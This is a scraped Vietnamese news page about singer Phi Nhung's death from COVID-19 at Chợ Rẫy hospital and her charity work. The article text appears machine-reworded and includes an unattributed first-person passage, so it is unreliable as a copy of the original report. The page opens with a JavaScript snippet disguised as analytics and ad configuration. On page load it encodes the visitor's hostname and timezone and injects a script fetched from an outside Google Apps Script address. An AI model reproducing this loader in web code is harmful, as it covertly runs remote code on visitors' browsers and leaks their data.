var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Ca sĩ Phi Nhung trút hơi thở cuối cùng trưa 28-9 tại Bệnh viện Chợ Rẫy

Ca sĩ Phi Nhung trút hơi thở cuối cùng trưa 28-9 tại Bệnh viện Chợ Rẫy

TTO – Sau thời gian chống chọi với COVID-19, và được sự nỗ lực điều trị của y bác sĩ Bệnh viện Chợ Rẫy nhưng ca sĩ Phi Nhung đã không qua khỏi, cô trút hơi thở cuối cùng vào lúc 11h57 trưa nay, 28-9. Bệnh viện Chợ Rẫy xác nhận với Tuổi Trẻ Online.

Cùng với cơn bão Cytokine, Phi Nhung – một nghệ sĩ âm nhạc – đã bị suy đa cơ quan và chẩn đoán mắc biến chứng nặng do COVID-19. Bên cạnh đó, phổi của cô ấy cũng bị đông đặc và một phần bị hoại tử trước khi qua đời.

Bệnh nhân được áp dụng công nghệ tim phổi nhân tạo ECMO, lọc máu liên tục.

Các loại thuốc có giá trị cao nhất đã được sử dụng để điều trị cho ca sĩ Phi Nhung tại bệnh viện. Mặc dù y bác sĩ đã cố gắng hết sức nhưng không thể cứu sống được ca sĩ. Thật đáng tiếc khi nguồn tin từ Bệnh viện Chợ Rẫy chia sẻ tin tức này.

Sau hơn 1 tháng chiến đấu kiên cường.

Tại cơ sở y tế Gia An 115, Phi Nhung được nhập viện từ ngày 15-8 nhưng vì tình trạng bệnh tình chuyển sang cơ sở y tế Chợ Rẫy vào ngày 26-8. Hiện tại đã được 1 tháng 2 ngày cô đang được chăm sóc tại đây.

Trong suốt hơn 20 năm hoạt động trong lĩnh vực nghệ thuật, Phi Nhung hiếm khi gặp phải sự quấy rối của cuộc sống cá nhân. Gần đây, cô đã nhận nuôi nhiều trẻ mồ côi và bất đắc dĩ phải chăm sóc cho họ. Phi Nhung đã từng thổ lộ rằng cô muốn sống một mình để có thể tập trung chăm sóc cho các con và không muốn đưa họ vào tình huống khó khăn như cô đã trải qua.

Trong tháng 7-2021, Phi Nhung đã lên kế hoạch trở lại Mỹ để gặp con gái, tuy nhiên cô đã quyết định ở lại TP.HCM bởi thành phố đang phải đối mặt với nhiều tổn thương và khó khăn do dịch bệnh. Cô tin rằng ở lại sẽ giúp ích hơn và khi mọi thứ ổn định hơn, cô sẽ không có bất kỳ nỗi lo khi đi đâu.

Từ giữa tháng sáu đến ngày 5-8, Phi Nhung quyết định ở lại và tiếp tục cuộc hành trình thiện nguyện của mình như kêu gọi mua thiết bị hô hấp, đóng góp cho quỹ tiêm chủng, tặng gạo cho người nghèo, tham gia vào hoạt động nấu ăn cho bếp ăn tình thương dành cho người vô gia cư…

Mỗi tuần, người hát chú ý đến việc bảo vệ sức khỏe bằng cách kiểm tra COVID-19, nhưng đáng tiếc cô đã mắc phải căn bệnh không rõ nguồn gốc.

Phi Nhung hoàn thành nhiệm vụ thiên thần.

Trong tuyên bố mới nhất về tình trạng sức khỏe của Phi Nhung, đội ngũ của cô đã viết những câu: “Phi Nhung đã được giải thoát khỏi nỗi lo âu. Cô đã kết thúc cuộc hành trình của mình và nghỉ ngơi trong bình yên. Cô vẫn cảm nhận được tình cảm chân thành từ bạn bè, đồng nghiệp và khán giả cho đến lúc ra đi.”

Chị đã nhận được sự yêu mến nhiều người xem không phải là do may mắn mà là nhờ vào tình cảm chân thành. Từ trước đến nay, Phi Nhung luôn là một ký ức đẹp đẽ trong lòng người yêu nhạc. Hơn thế nữa, chị đã truyền cảm hứng cho nhiều người thông qua hành trình thiện nguyện và giúp đỡ đời sống của người khác.

Phi Nhung khẳng định rằng niềm hạnh phúc tuyệt đối đến từ việc làm từ thiện, bất kể những lời nói nào. Cô không quan tâm đến những ý kiến của người khác. Hiện tại, việc Phi Nhung thực hiện từ thiện càng nhiều thì càng gặp phải những điều không công bằng, tuy nhiên cô vẫn cảm thấy hạnh phúc. Cô tin rằng sống thật thà không có gì phải sợ hãi.

Sở thích của tôi từ nhỏ đến hiện tại là thực hiện những việc mà tôi yêu thích. Nếu không có điều kiện tài chính, tôi khuyên mọi người hãy tham gia các hoạt động từ thiện và cùng nghệ sĩ khác nấu ăn cho những người có hoàn cảnh khó khăn. Nếu có điều kiện và nhiều tiền bạc, tôi vẫn sẽ tiếp tục thực hiện sở thích của mình.

Suốt hơn 20 năm qua, việc từ thiện của Phi Nhung ở Việt Nam đã giúp đỡ tổng cộng 23 trẻ mồ côi. Dù gặp khó khăn vì thiên tai, lụt lội hay hạn hán, Phi Nhung luôn sẵn sàng cứu trợ. Bất kể nơi nào cần sự giúp đỡ, Phi Nhung luôn có mặt để hỗ trợ.

Chị đã xuất hiện tại các vùng núi, vùng hẻo lánh và vùng xa xôi trong đất nước Việt Nam. Chuyến đi thiện nguyện kéo dài 20 năm đã được ghi nhận trên danh tiếng của Phi Nhung. Ngôi sao Phi Nhung vẫn lấp lánh trên bầu trời và trong trái tim người hâm mộ, dù chị đã trở về với thiên đường.